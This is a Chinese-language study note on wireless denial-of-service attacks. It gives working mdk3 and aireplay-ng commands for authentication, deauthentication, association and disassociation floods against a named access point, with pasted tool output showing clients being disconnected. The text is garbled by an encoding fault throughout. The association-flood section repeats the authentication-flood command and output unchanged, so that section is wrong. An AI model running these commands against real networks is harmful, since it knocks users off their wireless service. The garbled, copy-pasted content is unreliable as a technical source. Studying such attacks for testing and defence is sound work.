記錄下自己最近一段時(shí)間對(duì)無(wú)線滲透學(xué)習(xí)的筆記。 無(wú)線DOS就是無(wú)線拒絕服務(wù)攻擊����。主要包括以下幾種攻擊類(lèi)型:Auth Dos攻擊、Deauth Flood攻擊���、Disassociate攻擊及RF干擾攻擊等���。
無(wú)線DOS工具:MDK3���、Charon(MDK3圖形界面)、aireplay-ng 無(wú)線客戶端狀態(tài):IEEE 802.11定義了一種客戶端狀態(tài)機(jī)制���,用于跟蹤工作站身份驗(yàn)證和關(guān)聯(lián)狀態(tài)�����。 
一���、Auth Flood攻擊 Auth Flood攻擊:即身份驗(yàn)證洪水攻擊。該攻擊目標(biāo)主要針對(duì)那些處于通過(guò)驗(yàn)證�����、和AP建立關(guān)聯(lián)的關(guān)聯(lián)客戶端�����,攻擊者將向AP發(fā)送大量偽造的身份驗(yàn)證請(qǐng)求幀(偽造的身份驗(yàn)證服務(wù)和狀態(tài)代碼)���,當(dāng)收到大量偽造的身份驗(yàn)證請(qǐng)求超過(guò)所能承受的能力時(shí)���,AP將斷開(kāi)其他無(wú)線服務(wù)連接����。 攻擊步驟: 1 使用airodump-ng wlan0mon 查看當(dāng)前無(wú)線網(wǎng)絡(luò)狀況 2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s] 其中: a:表示的是authentication DOS模式 -a:攻擊指定的AP���,此處輸入的是AP的MAC地址 -s:發(fā)送數(shù)據(jù)包速率
當(dāng)攻擊成功后���,指定的AP會(huì)有很多的不存在的無(wú)線站點(diǎn)與之聯(lián)系。 1 airodump-ng wlan0mon命令窗口 結(jié)果如下: CH 9 ][ Elapsed: 3 mins ][ 2017-04-29 16:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -31 112 163 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 F8:F2:BC:C6:51:5D 0 0 - 1 0 1 D8:15:0D:2D:CB:58 F3:40:CE:5E:A1:8A 0 0 - 0 0 1 D8:15:0D:2D:CB:58 BC:1A:0E:BD:3F:D1 0 0 - 0 0 1 D8:15:0D:2D:CB:58 32:5B:DC:7C:DE:9F 0 0 - 1 0 1 D8:15:0D:2D:CB:58 A7:31:EC:CF:2B:5C 0 0 - 0 0 1 D8:15:0D:2D:CB:58 AA:87:1B:45:07:C5 0 0 - 1 0 1 D8:15:0D:2D:CB:58 16:EF:9B:80:A9:63 0 0 - 1 0 1 D8:15:0D:2D:CB:58 AE:C1:8E:C0:B6:26 0 0 - 1 0 1 D8:15:0D:2D:CB:58 84:3C:B5:5D:E1:00 0 0 - 1 0 1 D8:15:0D:2D:CB:58 C9:80:8B:1A:8F:7E 0 0 - 1 0 1 D8:15:0D:2D:CB:58 D9:A3:50:0F:F2:40 0 0 - 0 0 1 D8:15:0D:2D:CB:58 79:C5:24:71:A8:5E 0 0 - 0 0 1 D8:15:0D:2D:CB:58 20:EB:6C:93:84:56 0 0 - 1 0 1 2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下: Device is still responding with 304500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305000 clients connected! Connecting Client: F8:3B:97:58:E8:AF to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306000 clients connected! Connecting Client: 5E:08:C2:3A:77:49 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307000 clients connected! Connecting Client: 8D:BC:1B:E5:24:C7 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! 3 抓包查看無(wú)線流量情況 
二���、Deauth Flood攻擊 Deauth Flood攻擊即為取消驗(yàn)證洪水攻擊,它旨在通過(guò)欺騙從AP到客戶端單播地址的取消身份驗(yàn)證幀來(lái)將客戶端轉(zhuǎn)為未關(guān)聯(lián)/未認(rèn)證的狀態(tài)����。對(duì)于目前的工具來(lái)說(shuō),這種形式的攻擊在打斷客戶無(wú)線服務(wù)方面非常有效和快捷����。一般來(lái)說(shuō),在攻擊者發(fā)送另一個(gè)取消身份驗(yàn)證幀之前���,客戶端會(huì)重新關(guān)聯(lián)和認(rèn)證以再次獲取服務(wù)���。攻擊者反復(fù)欺騙取消身份驗(yàn)證幀才能使所有客戶端持續(xù)拒絕服務(wù)�����。 攻擊步驟: 1 使用airodump-ng wlan0mon來(lái)查看當(dāng)前無(wú)線網(wǎng)絡(luò)狀況 2 mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2] 或也可以使用aireplay-ng -0 0來(lái)完成deauth 攻擊 其中: d:表示的是deauthentication/disassociation攻擊模式 -c:針對(duì)的是無(wú)線網(wǎng)絡(luò)工作頻道����,這里選擇為1 -w:file白名單模式����,w就是白名單的簡(jiǎn)寫(xiě),即后跟文件中包含AP的MAC會(huì)在攻擊中回避 -b:file黑名單模式���,b就是黑名單的簡(jiǎn)寫(xiě)���,即后跟預(yù)攻擊目標(biāo)AP的MAC列表
攻擊成功后,所屬信道的AP的客戶端會(huì)斷開(kāi)連接 1 airodump-ng wlan0mon 命令窗口����,結(jié)果如下: CH 14 ][ Elapsed: 6 mins ][ 2017-04-29 16:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -63 683 1186 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 FF:FF:FF:FF:FF:FF 0 0 - 0 0 8 D8:15:0D:2D:CB:58 20:82:C0:A9:E2:A6 0 1e- 0 0 147 D8:15:0D:2D:CB:58 5C:E0:C5:1A:17:C9 -52 0 - 1e 0 33 D8:15:0D:2D:CB:58 00:5A:13:2F:04:A0 -42 0e- 1e 0 1644 2 mdk3 wlan0mon d -c 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 3 抓包查看無(wú)線流量情況 
三、Association Flood攻擊 Association Flood攻擊即為關(guān)聯(lián)洪水攻擊�����。在無(wú)線路由器或者接入點(diǎn)內(nèi)置一個(gè)列表即為連接狀態(tài)表,里面可顯示出所有與該AP建立連接的無(wú)線客戶端狀態(tài)�����。它試圖通過(guò)利用大量模仿和偽造的無(wú)線客戶端關(guān)聯(lián)來(lái)填充AP的客戶端關(guān)聯(lián)表����,從而達(dá)到淹沒(méi)AP的目的。 由于開(kāi)放身份驗(yàn)證(空身份驗(yàn)證)允許任何客戶端通過(guò)身份驗(yàn)證后關(guān)聯(lián)�����。利用這種漏洞的攻擊者可以通過(guò)創(chuàng)建多個(gè)到達(dá)已連接或已關(guān)聯(lián)的客戶端來(lái)模仿很多客戶端����,從而淹沒(méi)目標(biāo)AP的客戶端關(guān)聯(lián)表。 攻擊步驟: 1 使用airodump-ng wlan0mon 查看當(dāng)前無(wú)線網(wǎng)絡(luò)狀況 2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s] 其中: a:表示的是authentication DOS模式 -a:攻擊指定的AP���,此處輸入的是AP的MAC地址 -s:發(fā)送數(shù)據(jù)包速率
當(dāng)攻擊成功后,指定的AP會(huì)有很多的不存在的無(wú)線站點(diǎn)與之聯(lián)系�����。 1 airodump-ng wlan0mon命令窗口 結(jié)果如下 CH 9 ][ Elapsed: 3 mins ][ 2017-04-29 16:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -31 112 163 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 F8:F2:BC:C6:51:5D 0 0 - 1 0 1 D8:15:0D:2D:CB:58 F3:40:CE:5E:A1:8A 0 0 - 0 0 1 D8:15:0D:2D:CB:58 BC:1A:0E:BD:3F:D1 0 0 - 0 0 1 D8:15:0D:2D:CB:58 32:5B:DC:7C:DE:9F 0 0 - 1 0 1 D8:15:0D:2D:CB:58 A7:31:EC:CF:2B:5C 0 0 - 0 0 1 D8:15:0D:2D:CB:58 AA:87:1B:45:07:C5 0 0 - 1 0 1 D8:15:0D:2D:CB:58 16:EF:9B:80:A9:63 0 0 - 1 0 1 D8:15:0D:2D:CB:58 AE:C1:8E:C0:B6:26 0 0 - 1 0 1 D8:15:0D:2D:CB:58 84:3C:B5:5D:E1:00 0 0 - 1 0 1 D8:15:0D:2D:CB:58 C9:80:8B:1A:8F:7E 0 0 - 1 0 1 D8:15:0D:2D:CB:58 D9:A3:50:0F:F2:40 0 0 - 0 0 1 D8:15:0D:2D:CB:58 79:C5:24:71:A8:5E 0 0 - 0 0 1 D8:15:0D:2D:CB:58 20:EB:6C:93:84:56 0 0 - 1 0 1 2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下: Device is still responding with 304500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305000 clients connected! Connecting Client: F8:3B:97:58:E8:AF to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306000 clients connected! Connecting Client: 5E:08:C2:3A:77:49 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307000 clients connected! Connecting Client: 8D:BC:1B:E5:24:C7 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! 3 抓包查看無(wú)線流量情況 
另外一種攻擊模式就是攻擊者集合了大量的無(wú)線網(wǎng)卡,或者是改裝的集合大量無(wú)線網(wǎng)卡芯片的捆綁式發(fā)射機(jī)(類(lèi)似于常說(shuō)的“短信群發(fā)器”)����,如果進(jìn)行大規(guī)模連接攻擊,對(duì)于目前廣泛使用的無(wú)線接入設(shè)備���,也是很有效果的�����。 四����、Disassociation Flood攻擊 Disassociation Flood攻擊即為取消關(guān)聯(lián)洪水攻擊�����,和deauthenticaiton flood攻擊表現(xiàn)方式很相似����。它通過(guò)欺騙從AP到客戶端的取消關(guān)聯(lián)幀來(lái)強(qiáng)制客戶端成為未關(guān)聯(lián)/未認(rèn)證的狀態(tài)。一般來(lái)說(shuō)����,在攻擊者發(fā)送另一個(gè)取消關(guān)聯(lián)幀之前����,客戶端會(huì)重新關(guān)聯(lián)以再次獲取服務(wù)���。攻擊者反復(fù)欺騙取消關(guān)聯(lián)幀才能使客戶端持續(xù)拒絕服務(wù)���。 Disassociation Broadcast攻擊和Disassociation Flood攻擊原理基本一致,只是在發(fā)送程度及使用工具上有所區(qū)別���,前者很多時(shí)候用于配合進(jìn)行無(wú)線中間人攻擊�����,而后者常用于目標(biāo)確定的點(diǎn)對(duì)點(diǎn)無(wú)線DOS����,比如破壞或干擾指定機(jī)構(gòu)或部門(mén)的無(wú)線接入點(diǎn)等�����。 攻擊步驟: 1���,使用airodump-ng wlan0mon來(lái)查看當(dāng)前無(wú)線網(wǎng)絡(luò)狀況 2,mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2] 其中: d:表示的是deauthentication/disassociation攻擊模式 -c:針對(duì)的是無(wú)線網(wǎng)絡(luò)工作頻道,這里選擇為1 -w:file白名單模式�����,w就是白名單的簡(jiǎn)寫(xiě)����,即后跟文件中包含AP的MAC會(huì)在攻擊中回避 -b:file黑名單模式,b就是黑名單的簡(jiǎn)寫(xiě)����,即后跟預(yù)攻擊目標(biāo)AP的MAC列表
攻擊成功后,所屬信道的AP的客戶端會(huì)斷開(kāi)連接 1���,airodump-ng wlan0mon 命令窗口����,結(jié)果如下: CH 14 ][ Elapsed: 6 mins ][ 2017-04-29 16:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -63 683 1186 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 FF:FF:FF:FF:FF:FF 0 0 - 0 0 8 D8:15:0D:2D:CB:58 20:82:C0:A9:E2:A6 0 1e- 0 0 147 D8:15:0D:2D:CB:58 5C:E0:C5:1A:17:C9 -52 0 - 1e 0 33 D8:15:0D:2D:CB:58 00:5A:13:2F:04:A0 -42 0e- 1e 0 1644 2����,mdk3 wlan0mon d -c 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 3,抓包查看無(wú)線流量情況 
五����、RF Jamming攻擊 RF Jamming攻擊即為RF干擾攻擊����。該攻擊是通過(guò)發(fā)出干擾射頻達(dá)到破壞正常無(wú)線通信的目的����。而前面幾種攻擊主要是基于無(wú)線通信過(guò)程及協(xié)議的。RF為射頻���,主要包括無(wú)線信號(hào)發(fā)射機(jī)及收信機(jī)等����。 這里因環(huán)境限制身旁沒(méi)有測(cè)試設(shè)備����,所以具體的數(shù)據(jù)包無(wú)法展示,后面有機(jī)會(huì)再單獨(dú)展開(kāi)����。
|
